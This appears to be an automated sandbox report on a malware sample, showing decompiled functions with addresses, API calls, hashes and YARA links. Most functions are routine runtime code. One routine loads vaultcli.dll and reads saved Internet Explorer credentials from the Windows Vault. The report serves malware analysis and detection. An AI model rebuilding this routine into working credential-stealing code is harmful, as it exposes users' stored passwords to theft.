                                                                    Function 0040DBEA Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,?,0040AA2A,0040DDBD,?,?,00408222,?,?,00407B01,?,2CD7C1E8), ref: 0040DBEF
                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,0040AA2A,0040DDBD,?,?,00408222,?,?,00407B01,?,2CD7C1E8), ref: 0040DC15
                                                                    • _free.LIBCMT ref: 0040DC55
                                                                    • _free.LIBCMT ref: 0040DC88
                                                                    • SetLastError.KERNEL32(00000000), ref: 0040DC95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free
                                                                    • String ID:
                                                                    • API String ID: 3170660625-0
                                                                    • Opcode ID: 3a62f75f6f6d473855ada7fce9feacd53a03f44f5891ded4776ade272f0317d5
                                                                    • Instruction ID: 22418cb6036aa0ddd6ca84a637dcae786ebeb05e80c2cc32edb63c71d5d2d1d2
                                                                    • Opcode Fuzzy Hash: 3a62f75f6f6d473855ada7fce9feacd53a03f44f5891ded4776ade272f0317d5
                                                                    • Instruction Fuzzy Hash: 5C11CA7D90890066E2122BB65D45D6B265DEBC2368714013BF514B22D1DEBD880A902D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040DA9C Relevance: 7.6, APIs: 5, Instructions: 65COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,0040B1FE,?,00000000,?,0040E3E2,?,00000000,00000000,?,00000000), ref: 0040DAA0
                                                                    • _free.LIBCMT ref: 0040DAF7
                                                                    • _free.LIBCMT ref: 0040DB2B
                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040DB38
                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,0040E3E2,?,00000000,00000000,?,00000000), ref: 0040DB44
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free
                                                                    • String ID:
                                                                    • API String ID: 3170660625-0
                                                                    • Opcode ID: a727337b5316149c2bce10c2231949ffc9b3182f12930bc09bc4b33c9c82bc90
                                                                    • Instruction ID: bb2762f6d32e43f8edf6b61ddcf376971766f196208522f48f112671c941c404
                                                                    • Opcode Fuzzy Hash: a727337b5316149c2bce10c2231949ffc9b3182f12930bc09bc4b33c9c82bc90
                                                                    • Instruction Fuzzy Hash: D311C63DA4490066D2127BF6AC05E7B316AAFC1328B29013BF920B63E1DE7C880A611D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1990A Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D1990A(intOrPtr _a4, intOrPtr _a8) {
				void _v28;
				void* _t13;
				signed int _t14;

				InitializeCriticalSection( &_v28);
				_t14 = 6;
				DeleteCriticalSection(memcpy(0x2e5db10,  &_v28, _t14 << 2));
				EnterCriticalSection(0x2e5db10);
				 *0x2e5db38 = _a4;
				GetModuleHandleA(0);
				 *0x2d296a0 = 0x2e5d0e8;
				if(_a8 == 0) {
					E02D11F76(0x2e5db5c);
					 *0x2e5d0e8 = 1;
					_t13 = E02D11F4B(0x2e5db54, E02D195AA, 0x2e5d0e8);
				} else {
					_t13 = E02D11F4B(0x2e5db5c, E02D1882F, 0x2e5d0e8);
					 *0x2e5dafc = 1;
				}
				LeaveCriticalSection(0x2e5db10);
				return _t13;
			}






                                                                    0x02d19916
                                                                    0x02d1991e
                                                                    0x02d1992d
                                                                    0x02d19939
                                                                    0x02d19944
                                                                    0x02d19949
                                                                    0x02d19958
                                                                    0x02d19963
                                                                    0x02d1997c
                                                                    0x02d1998c
                                                                    0x02d19996
                                                                    0x02d19965
                                                                    0x02d1996b
                                                                    0x02d19970
                                                                    0x02d19970
                                                                    0x02d1999c
                                                                    0x02d199a5

                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,02D12E0D,?,00000001,?,?), ref: 02D19916
                                                                    • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,02D12E0D,?,00000001,?,?), ref: 02D1992D
                                                                    • EnterCriticalSection.KERNEL32(02E5DB10,?,00000000,?,?,?,?,02D12E0D,?,00000001,?,?), ref: 02D19939
                                                                    • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,02D12E0D,?,00000001,?,?), ref: 02D19949
                                                                    • LeaveCriticalSection.KERNEL32(02E5DB10,?,00000000), ref: 02D1999C
                                                                      • Part of subcall function 02D11F4B: CreateThread.KERNEL32 ref: 02D11F60
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
                                                                    • String ID:
                                                                    • API String ID: 2964645253-0
                                                                    • Opcode ID: 676b962001afe72a4f9bcafff28cb4788d11336152e451bdc12ecb315db3ae51
                                                                    • Instruction ID: 7ce1e7e32d70eca0f7858a73d6eaeef782258374041a2a8de159e88ae333e8c9
                                                                    • Opcode Fuzzy Hash: 676b962001afe72a4f9bcafff28cb4788d11336152e451bdc12ecb315db3ae51
                                                                    • Instruction Fuzzy Hash: BE01F931D90224BBDB10AF61BC69ACB3F6EEB61310F418405F905A7741D7708859CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D20C79 Relevance: 7.5, APIs: 5, Instructions: 44processCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 93%
                                                                    			E02D20C79(signed int* __ecx, void* __edx) {
				char _v524;
				intOrPtr _v552;
				void* _v560;
				int _t9;
				void* _t15;
				void* _t19;
				signed int* _t20;

				_t15 = __edx;
				_v560 = 0x22c;
				_t20 = __ecx;
				_t19 = CreateToolhelp32Snapshot(2, 0);
				if(_t19 == 0xffffffff) {
					L6:
					 *_t20 =  *_t20 & 0x00000000;
				} else {
					_push( &_v560);
					_t9 = Process32FirstW(_t19);
					while(_t9 != 0) {
						if(_v552 == _t15) {
							CloseHandle(_t19);
							E02D135E5(_t20,  &_v524);
						} else {
							_t9 = Process32NextW(_t19,  &_v560);
							continue;
						}
						goto L7;
					}
					CloseHandle(_t19);
					goto L6;
				}
				L7:
				return _t20;
			}










                                                                    0x02d20c89
                                                                    0x02d20c8b
                                                                    0x02d20c95
                                                                    0x02d20c9d
                                                                    0x02d20ca2
                                                                    0x02d20cd5
                                                                    0x02d20cd5
                                                                    0x02d20ca4
                                                                    0x02d20caa
                                                                    0x02d20cac
                                                                    0x02d20cca
                                                                    0x02d20cba
                                                                    0x02d20ce0
                                                                    0x02d20cef
                                                                    0x02d20cbc
                                                                    0x02d20cc4
                                                                    0x00000000
                                                                    0x02d20cc4
                                                                    0x00000000
                                                                    0x02d20cba
                                                                    0x02d20ccf
                                                                    0x00000000
                                                                    0x02d20ccf
                                                                    0x02d20cd9
                                                                    0x02d20cde

                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D20C97
                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 02D20CAC
                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 02D20CC4
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02D20CCF
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02D20CE0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 1789362936-0
                                                                    • Opcode ID: 7459c6dc51b5d8d7b84d99d0394ab3f1a7df639db7a0c45827a994a5bcd7aa31
                                                                    • Instruction ID: 7e9179fb695b00f5f8a8f0e25ed6227b23b186692faad6c88a64cdb8a2104a2d
                                                                    • Opcode Fuzzy Hash: 7459c6dc51b5d8d7b84d99d0394ab3f1a7df639db7a0c45827a994a5bcd7aa31
                                                                    • Instruction Fuzzy Hash: F501D171A01224BBD7306BB6AC4CB7E7BBCEB7472AF1054A5E905A2380E7708C5DDB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00411343 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 0041135B
                                                                      • Part of subcall function 0040DD40: HeapFree.KERNEL32(00000000,00000000,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?), ref: 0040DD56
                                                                      • Part of subcall function 0040DD40: GetLastError.KERNEL32(?,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?,?), ref: 0040DD68
                                                                    • _free.LIBCMT ref: 0041136D
                                                                    • _free.LIBCMT ref: 0041137F
                                                                    • _free.LIBCMT ref: 00411391
                                                                    • _free.LIBCMT ref: 004113A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 4b08d2cbb008381b0177714e4ef0e11a8813bdafe5eb6ff5743f56f4855835e1
                                                                    • Instruction ID: 520a62c1e8cd01b15c9c59d5e9cde0741d0704f92e5b2d9a1c9edf2e912cbc48
                                                                    • Opcode Fuzzy Hash: 4b08d2cbb008381b0177714e4ef0e11a8813bdafe5eb6ff5743f56f4855835e1
                                                                    • Instruction Fuzzy Hash: 5EF06836904608A7E610DBAAF481CAF73D9AF41314754080BF558EBA54C738FCC45A5C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1B627 Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D1B627(void* __ecx) {
				int _t15;
				void* _t18;

				_t18 = __ecx;
				FreeLibrary( *(__ecx + 0xb4));
				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
				FreeLibrary( *(_t18 + 0xa8));
				 *(_t18 + 0xa8) = 0;
				FreeLibrary( *(_t18 + 0xac));
				 *(_t18 + 0xac) = 0;
				FreeLibrary( *(_t18 + 0xb8));
				 *(_t18 + 0xb8) = 0;
				_t15 = FreeLibrary( *(_t18 + 0xb0));
				 *(_t18 + 0xb0) = 0;
				return _t15;
			}





                                                                    0x02d1b630
                                                                    0x02d1b638
                                                                    0x02d1b642
                                                                    0x02d1b648
                                                                    0x02d1b650
                                                                    0x02d1b656
                                                                    0x02d1b65e
                                                                    0x02d1b664
                                                                    0x02d1b66c
                                                                    0x02d1b672
                                                                    0x02d1b674
                                                                    0x02d1b67d

                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,?,?,00000000,02D1ABDF), ref: 02D1B638
                                                                    • FreeLibrary.KERNEL32(?,?,?,00000000,02D1ABDF), ref: 02D1B648
                                                                    • FreeLibrary.KERNEL32(?,?,?,00000000,02D1ABDF), ref: 02D1B656
                                                                    • FreeLibrary.KERNEL32(?,?,?,00000000,02D1ABDF), ref: 02D1B664
                                                                    • FreeLibrary.KERNEL32(?,?,?,00000000,02D1ABDF), ref: 02D1B672
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: a122d1116d5b6a9a51343cc2093216993d8b2da3eb161c6faee29fb59606df76
                                                                    • Instruction ID: d075cbc725422d11a1db5b8c6d0d7323a9f687750ee7d2b7de76ce24bdbe80e8
                                                                    • Opcode Fuzzy Hash: a122d1116d5b6a9a51343cc2093216993d8b2da3eb161c6faee29fb59606df76
                                                                    • Instruction Fuzzy Hash: E7F0A571B00B26BED7595F758C84B86FF6AFF49260F01462B952C42221CB716434DFD2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1B9A9 Relevance: 7.5, APIs: 5, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D1B9A9(void* __ecx) {
				int _t15;
				void* _t18;

				_t18 = __ecx;
				FreeLibrary( *(__ecx + 0xb4));
				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
				FreeLibrary( *(_t18 + 0xa8));
				 *(_t18 + 0xa8) = 0;
				FreeLibrary( *(_t18 + 0xac));
				 *(_t18 + 0xac) = 0;
				FreeLibrary( *(_t18 + 0xb8));
				 *(_t18 + 0xb8) = 0;
				_t15 = FreeLibrary( *(_t18 + 0xb0));
				 *(_t18 + 0xb0) = 0;
				return _t15;
			}





                                                                    0x02d1b9b2
                                                                    0x02d1b9ba
                                                                    0x02d1b9c4
                                                                    0x02d1b9ca
                                                                    0x02d1b9d2
                                                                    0x02d1b9d8
                                                                    0x02d1b9e0
                                                                    0x02d1b9e6
                                                                    0x02d1b9ee
                                                                    0x02d1b9f4
                                                                    0x02d1b9f6
                                                                    0x02d1b9ff

                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,00000001,?,00000000,02D1B132), ref: 02D1B9BA
                                                                    • FreeLibrary.KERNEL32(?,?,00000000,02D1B132), ref: 02D1B9CA
                                                                    • FreeLibrary.KERNEL32(?,?,00000000,02D1B132), ref: 02D1B9D8
                                                                    • FreeLibrary.KERNEL32(?,?,00000000,02D1B132), ref: 02D1B9E6
                                                                    • FreeLibrary.KERNEL32(?,?,00000000,02D1B132), ref: 02D1B9F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: a122d1116d5b6a9a51343cc2093216993d8b2da3eb161c6faee29fb59606df76
                                                                    • Instruction ID: d075cbc725422d11a1db5b8c6d0d7323a9f687750ee7d2b7de76ce24bdbe80e8
                                                                    • Opcode Fuzzy Hash: a122d1116d5b6a9a51343cc2093216993d8b2da3eb161c6faee29fb59606df76
                                                                    • Instruction Fuzzy Hash: E7F0A571B00B26BED7595F758C84B86FF6AFF49260F01462B952C42221CB716434DFD2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1B203 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 252COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 61%
                                                                    			E02D1B203(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v92;
				char _v96;
				char _v100;
				void* _t124;
				void* _t127;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t147;
				void* _t148;
				void* _t159;
				void* _t162;
				void* _t186;
				char _t226;
				intOrPtr _t229;
				char _t234;
				void* _t235;

				_t234 = 0;
				_t186 = __ecx;
				_t226 = 0;
				_v16 = 0;
				_v44 = 0;
				_v20 = 0;
				_v12 = 0;
				_v8 = 0;
				_v84 = 0;
				if(E02D1B559(__ecx) != 0) {
					_push( &_v16);
					_push(0);
					_push(0x2d29140);
					if( *((intOrPtr*)(__ecx + 0x8c))() == 0) {
						_push( &_v20);
						_push( &_v44);
						_push(0x200);
						_push(_v16);
						if( *((intOrPtr*)(__ecx + 0x94))() == 0) {
							_t240 = _v44;
							if(_v44 != 0) {
								_v80 = 0;
								_v40 = 0;
								_v36 = 0;
								do {
									_t124 = E02D1B526(_t240);
									_push(0x10);
									_push(0x2d29130);
									if(_t124 == 0) {
										_push(_t226);
										_v28 = _v20 + _v40;
										_t127 = E02D11000();
										_t235 = _t235 + 0xc;
										__eflags = _t127;
										if(__eflags == 0) {
											E02D135E5( &_v32,  *((intOrPtr*)(_v28 + 0x10)));
											_t133 = E02D13248( &_v32, E02D135E5( &_v64, L"Internet Explorer"));
											E02D15EA5(_v64);
											_v64 = _t234;
											__eflags = _t133;
											if(__eflags != 0) {
												asm("movaps xmm0, [0x2d27580]");
												asm("movups [ebp-0x60], xmm0");
												E02D13437( &_v100, E02D135E5( &_v68,  *((intOrPtr*)(_v8 + 0x14)) + 0x20));
												E02D15EA5(_v68);
												_v68 = _t234;
												E02D13437( &_v96, E02D135E5( &_v72,  *((intOrPtr*)(_v8 + 0x18)) + 0x20));
												E02D15EA5(_v72);
												_v12 = _t234;
												_t147 = _v28;
												_v72 = _t234;
												_t148 =  *((intOrPtr*)(_t186 + 0x98))(_v16, _t147,  *((intOrPtr*)(_t147 + 0x14)),  *((intOrPtr*)(_t147 + 0x18)), _t234, _t234, _t234,  &_v12);
												__eflags = _t148;
												if(_t148 == 0) {
													_v8 = _v12;
													__eflags =  *((intOrPtr*)(_v28 + 0x1c)) + 0x20;
													E02D13437( &_v84, E02D135E5( &_v76,  *((intOrPtr*)(_v28 + 0x1c)) + 0x20));
													E02D15EA5(_v76);
													_v76 = _t234;
												}
												_t235 = _t235 - 0x10;
												E02D11F95(_t235,  &_v100);
												E02D11FCB(_t186);
												E02D113EF( &_v100);
											}
											E02D15EA5(_v32);
											_v32 = _t234;
											goto L18;
										}
									} else {
										_t226 = _v36 + _v20;
										_push(_t226);
										_v8 = _t226;
										_t159 = E02D11000();
										_t235 = _t235 + 0xc;
										if(_t159 == 0) {
											E02D135E5( &_v24,  *((intOrPtr*)(_t226 + 0x10)));
											_t162 = E02D13248( &_v24, E02D135E5( &_v48, L"Internet Explorer"));
											E02D15EA5(_v48);
											_v48 = _t234;
											if(_t162 != 0) {
												_t229 = _v8;
												asm("movaps xmm0, [0x2d27580]");
												asm("movups [ebp-0x60], xmm0");
												E02D13437( &_v100, E02D135E5( &_v52,  *((intOrPtr*)(_t229 + 0x14)) + 0x20));
												E02D15EA5(_v52);
												_v52 = _t234;
												E02D13437( &_v96, E02D135E5( &_v56,  *((intOrPtr*)(_t229 + 0x18)) + 0x20));
												E02D15EA5(_v56);
												_v12 = _t234;
												_push( &_v12);
												_push(_t234);
												_push(_t234);
												_push(_t234);
												_push( *((intOrPtr*)(_t229 + 0x18)));
												_v56 = _t234;
												_push( *((intOrPtr*)(_t229 + 0x14)));
												_push(_t229);
												_push(_v16);
												if( *((intOrPtr*)(_t186 + 0x98))() == 0) {
													_v8 = _v12;
													E02D13437( &_v92, E02D135E5( &_v60,  *((intOrPtr*)(_v12 + 0x1c)) + 0x20));
													E02D15EA5(_v60);
													_v60 = _t234;
												}
												_t235 = _t235 - 0x10;
												E02D11F95(_t235,  &_v100);
												E02D11FCB(_t186);
												E02D113EF( &_v100);
											}
											E02D15EA5(_v24);
											_v24 = _t234;
											L18:
											_t226 = _v8;
										}
									}
									_v36 = _v36 + 0x38;
									_t129 = _v80 + 1;
									_v40 = _v40 + 0x34;
									_v80 = _t129;
								} while (_t129 < _v44);
								_t234 = _v84;
							}
						}
					}
				}
				if(_v20 != 0) {
					 *((intOrPtr*)(_t186 + 0xa0))(_v20);
				}
				if(_v16 != 0) {
					 *((intOrPtr*)(_t186 + 0x90))( &_v16);
				}
				FreeLibrary( *(_t186 + 0xc0));
				E02D15EA5(_t234);
				E02D15EA5(0);
				return E02D15EA5(0);
			}







































                                                                    0x02d1b20b
                                                                    0x02d1b20d
                                                                    0x02d1b210
                                                                    0x02d1b212
                                                                    0x02d1b215
                                                                    0x02d1b218
                                                                    0x02d1b21b
                                                                    0x02d1b21e
                                                                    0x02d1b221
                                                                    0x02d1b22b
                                                                    0x02d1b234
                                                                    0x02d1b235
                                                                    0x02d1b236
                                                                    0x02d1b243
                                                                    0x02d1b24c
                                                                    0x02d1b250
                                                                    0x02d1b251
                                                                    0x02d1b256
                                                                    0x02d1b261
                                                                    0x02d1b26a
                                                                    0x02d1b26c
                                                                    0x02d1b272
                                                                    0x02d1b275
                                                                    0x02d1b278
                                                                    0x02d1b27b
                                                                    0x02d1b27b
                                                                    0x02d1b280
                                                                    0x02d1b282
                                                                    0x02d1b289
                                                                    0x02d1b3ad
                                                                    0x02d1b3ae
                                                                    0x02d1b3b1
                                                                    0x02d1b3b6
                                                                    0x02d1b3b9
                                                                    0x02d1b3bb
                                                                    0x02d1b3ca
                                                                    0x02d1b3e0
                                                                    0x02d1b3ea
                                                                    0x02d1b3ef
                                                                    0x02d1b3f2
                                                                    0x02d1b3f4
                                                                    0x02d1b400
                                                                    0x02d1b407
                                                                    0x02d1b41b
                                                                    0x02d1b423
                                                                    0x02d1b431
                                                                    0x02d1b43e
                                                                    0x02d1b446
                                                                    0x02d1b44e
                                                                    0x02d1b452
                                                                    0x02d1b45b
                                                                    0x02d1b465
                                                                    0x02d1b46b
                                                                    0x02d1b46d
                                                                    0x02d1b478
                                                                    0x02d1b47e
                                                                    0x02d1b48b
                                                                    0x02d1b493
                                                                    0x02d1b498
                                                                    0x02d1b498
                                                                    0x02d1b49b
                                                                    0x02d1b4a4
                                                                    0x02d1b4ab
                                                                    0x02d1b4b3
                                                                    0x02d1b4b3
                                                                    0x02d1b4bb
                                                                    0x02d1b4c0
                                                                    0x00000000
                                                                    0x02d1b4c0
                                                                    0x02d1b28f
                                                                    0x02d1b292
                                                                    0x02d1b295
                                                                    0x02d1b296
                                                                    0x02d1b299
                                                                    0x02d1b29e
                                                                    0x02d1b2a3
                                                                    0x02d1b2af
                                                                    0x02d1b2c5
                                                                    0x02d1b2cf
                                                                    0x02d1b2d4
                                                                    0x02d1b2d9
                                                                    0x02d1b2df
                                                                    0x02d1b2e5
                                                                    0x02d1b2ec
                                                                    0x02d1b300
                                                                    0x02d1b308
                                                                    0x02d1b316
                                                                    0x02d1b323
                                                                    0x02d1b32b
                                                                    0x02d1b333
                                                                    0x02d1b336
                                                                    0x02d1b337
                                                                    0x02d1b338
                                                                    0x02d1b339
                                                                    0x02d1b33a
                                                                    0x02d1b33d
                                                                    0x02d1b340
                                                                    0x02d1b343
                                                                    0x02d1b344
                                                                    0x02d1b34f
                                                                    0x02d1b357
                                                                    0x02d1b36a
                                                                    0x02d1b372
                                                                    0x02d1b377
                                                                    0x02d1b377
                                                                    0x02d1b37a
                                                                    0x02d1b383
                                                                    0x02d1b38a
                                                                    0x02d1b392
                                                                    0x02d1b392
                                                                    0x02d1b39a
                                                                    0x02d1b39f
                                                                    0x02d1b4c3
                                                                    0x02d1b4c3
                                                                    0x02d1b4c3
                                                                    0x02d1b2a3
                                                                    0x02d1b4c9
                                                                    0x02d1b4cd
                                                                    0x02d1b4ce
                                                                    0x02d1b4d2
                                                                    0x02d1b4d5
                                                                    0x02d1b4de
                                                                    0x02d1b4de
                                                                    0x02d1b26c
                                                                    0x02d1b261
                                                                    0x02d1b243
                                                                    0x02d1b4e5
                                                                    0x02d1b4ea
                                                                    0x02d1b4ea
                                                                    0x02d1b4f4
                                                                    0x02d1b4fa
                                                                    0x02d1b4fa
                                                                    0x02d1b506
                                                                    0x02d1b50e
                                                                    0x02d1b515
                                                                    0x02d1b525

                                                                    APIs
                                                                      • Part of subcall function 02D1B559: LoadLibraryA.KERNEL32(vaultcli.dll,00000000,02D1B229), ref: 02D1B561
                                                                    • FreeLibrary.KERNEL32(?), ref: 02D1B506
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
